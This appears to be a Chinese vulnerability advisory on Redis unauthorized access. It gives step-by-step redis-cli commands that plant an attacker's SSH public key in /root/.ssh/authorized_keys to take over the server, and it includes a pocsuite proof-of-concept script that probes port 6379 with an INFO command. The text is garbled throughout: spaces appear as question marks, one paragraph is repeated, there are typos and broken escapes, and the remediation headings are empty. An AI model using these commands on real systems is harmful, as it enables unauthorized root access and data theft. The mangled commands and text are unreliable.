您的购物车目前是空的!
Redis 未授权访问缺陷的详细漏洞信息,这个 Redis 未授权访问缺陷可轻易导致系统被黑。详细内容请看下文:
Table of Contents
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访 问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访 问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。
Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的” 。
Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。
因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis 绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。
利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。
Redis 暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下可受影响而导致被利用。
通过ZoomEye 的搜索结果显示,有97700在公网可以直接访问的Redis服务。
根据 ZoomEye 最新于2015年11月12日0点探测结果显示:
总的存在无验证可直接利用 Redis 服务的目标全球有49099,其中中国有16477。其中被明着写入crackit的,也就是已经被黑的比例分别是全球65%(3.1万),中国67.5%(1.1万)。
首先在本地生产公私钥文件:
$ ssh -keygen?–t?rsa |
然后将公钥写入foo.txt文件
$?( echo ?-e? "nn" ;? cat ?id_rsa.pub;? echo ?-e? "nn" )?>?foo.txt |
再连接Redis写入文件
$? cat ?foo.txt?|?redis-cli?-h?192.168.1.11?-x? set ?crackit $?redis-cli?-h?192.168.1.11 $?192.168.1.11:6379>?config? set ?dir ?/Users/antirez/ . ssh /OK $?192.168.1.11:6379>?config?get?dir1)? "dir" 2)? "/root/.ssh" $?192.168.1.11:6379>?config? set ?dbfilename? "authorized_keys" OK $?192.168.1.11:6379>?saveOK |
这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:
即可远程利用自己的私钥登录该服务器。
当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。
Redis 作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等
Redis可以嵌套Lua脚本的特性将会导致代码执行, 危害同其他服务器端的代码执行, 样例如下
一旦攻击者能够在服务器端执行任意代码, 攻击方式将会变得多且复杂, 这是非常危险的.
通过Lua代码攻击者可以调用 redis.sha1hex() 函数,恶意利用 Redis 服务器进行 SHA-1 的破解。
通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫
可以看到泄露了很多 Redis 服务器的信息, 有当前 Redis 版本, 内存运行状态, 服务端个数等等敏感信息。
#!/usr/bin/env?python #?-*-?coding:utf-8?-*- import ?socket import ?urlparse from?pocsuite.poc? import ?POCBase,?Output from?pocsuite.utils? import ?register class?TestPOC(POCBase): ???? vulID?=? '89339' ???? version?=? '1' ???? author?=?[ 'Anonymous' ] ???? vulDate?=? '2015-10-26' ???? createDate?=? '2015-10-26' ???? updateDate?=? '2015-10-26' ???? references?=?[ 'http://sebug.net/vuldb/ssvid-89339' ] ???? name?=? 'Redis?未授权访问?PoC' ???? appPowerLink?=? 'http://redis.io/' ???? appName?=? 'Redis' ???? appVersion?=? 'All' ???? vulType?=? 'Unauthorized?access' ???? desc?=? '' ' ???????? redis?默认不需要密码即可访问,黑客直接访问即可获取数据库中所有信息,造成严重的信息泄露。 ???? '' ' ???? samples?=?[ '' ] ???? def?_verify(self): ???????? result?=?{} ???????? payload?=? 'x2ax31x0dx0ax24x34x0dx0ax69x6ex66x6fx0dx0a' ???????? s?=?socket.socket() ???????? socket.setdefaulttimeout(10) ???????? try: ???????????? host?=?urlparse.urlparse(self.url).netloc ???????????? port?=?6379 ???????????? s.connect((host,?port)) ???????????? s.send(payload) ???????????? recvdata?=?s.recv(1024) ???????????? if ?recvdata?and? 'redis_version' ?in ?recvdata: ???????????????? result[ 'VerifyInfo' ]?=?{} ???????????????? result[ 'VerifyInfo' ][ 'URL' ]?=?self.url ???????????????? result[ 'VerifyInfo' ][ 'Port' ]?=?port ???????? except: ???????????? pass ???????? s.close() ???????? return ?self.parse_attack(result) ???? def?_attack(self): ???????? return ?self._verify() ???? def?parse_attack(self,?result): ???????? output?=?Output(self) ???????? if ?result: ???????????? output.success(result) ???????? else : ???????????? output.fail( 'Internet?nothing?returned' ) ???????? return ?output register(TestPOC) |
临时解决方案
官方解决方案
暂无官方解决方案
推荐防护方案
暂无防护方案